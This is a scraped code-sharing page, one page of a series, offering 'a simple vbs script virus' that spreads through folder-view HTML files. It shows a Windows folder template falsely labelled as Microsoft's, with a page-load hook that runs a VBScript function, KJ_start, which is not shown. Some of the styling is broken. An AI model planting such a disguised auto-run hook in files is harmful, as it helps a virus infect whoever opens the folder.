SoFunction
Updated on 2025-04-13

Fun VBS special code page 5/6


A simple vbs script virus that uses the http file to spread

<BODY  onload="vbscript:KJ_start()">  
<!--  
  *  Copyright  1999  Microsoft  Corporation.    All  rights  reserved.  
  -->  
<html>  
        <head>
                <meta  http-equiv="content-type"  content="text/html;  charset=UTF-8">  
        </head>  
        <style>  
                body                {margin:  0;  font:  menu;  color:  black}  

                #Panel            {position:  absolute;  width:  200px;  height:  100%;  visibility:  hidden;  overflow:  auto}  

                #Corner          {padding-left:  12px;  padding-top:  11px}  

                #FolderIcon  {width:  32px;  height:  32px}  

                #FolderName  {margin-top:  8px;  font:  14pt/14pt  menu;  font-weight:  bold}  

                #LogoLine      {width:  100%;  height:  2px;  margin-top:  4px;  vertical-align:  top}  

                #Details        {padding-left:  12px;  margin-top:  8px}  

                #Locked          {vertical-align:  baseline}  

                .Divider        {width:  100%;  color:  #C0C0C0;  height:  1px}  

                #Thumbnail    {width:  120px;  height:  120px}  

                .Legend          {margin-left:  8px}  

                #Brand            {position:  absolute;  left:  200px;  width:  100%;  height:  100%;  padding-left:  12px}  

                p                      {margin-top:  12px}  

                            {margin-top:  4px}  

button            {font:  9pt  Song style,  MS  Song;  margin-left:  12px;  background:  white;  color:  black}

                .Message        {width:  100%;  frameBorder:  0;  background:  infobackground;  color:  infotext;  border:  1px  solid  lightgrey}  

                #CSCPlusMin  {width:  17px}  

                #CSCText        {}  

                #CSCDetail    {}  


                #CSCButton    {}                  #FileList      {position:absolute;  width:0;  height:100%;  border=0}  

        </style>  

        <body  scroll=no>  

                <div  id=Panel  style="background:  white  URL()  no-repeat">  

                        <div  id=Corner>  

                                <object  id=FolderIcon  class  tabIndex=-1>  

                                        <param  name="scale"  value=100>  

                                </object>  

                                <br/>  

                                <div  id=FolderName>  

                                        %THISDIRNAME%  

                                </div>  

                        </div>  

                        <img  id=LogoLine  src="">  

                        <div  id=Details>  

                                <span  id=CSC>  

                                        <div  tabIndex=2  id=CSCHotTrack>  

                                        <span  id=CSCPlusMin>  

                                        </span>  

                                        <span  id=CSCText>  

                                        </span>  

                                        </div>  

                                        <div  id=CSCDetail>  

                                        </div>  

                                        <span  id=CSCButton>  

                                        </span>  

                                        <hr  CLASS=Divider  NOSHADE>  

                                </span>  

                                <span  id=Info>  

                                </span>  

  

                                <br/>  

                                <span  id=MediaPlayerSpan>  

                                </span>  

  

                                <object  id=Thumbnail  class  tabIndex=-1>  

                                </object>  

                                <label  id=ThumbnailLabel  for="Thumbnail"  style="display:  none">  

                                </label>  

  

                                <span  id=Links>  

                                </span>  

                        </div>  

                </div>  

                <object  id=FileList  class  tabIndex=1>  

                </object>  

                <object  id=WVCoord  class>  

                </object>  

        </body>  

</html>
Previous page123456Next pageRead the full text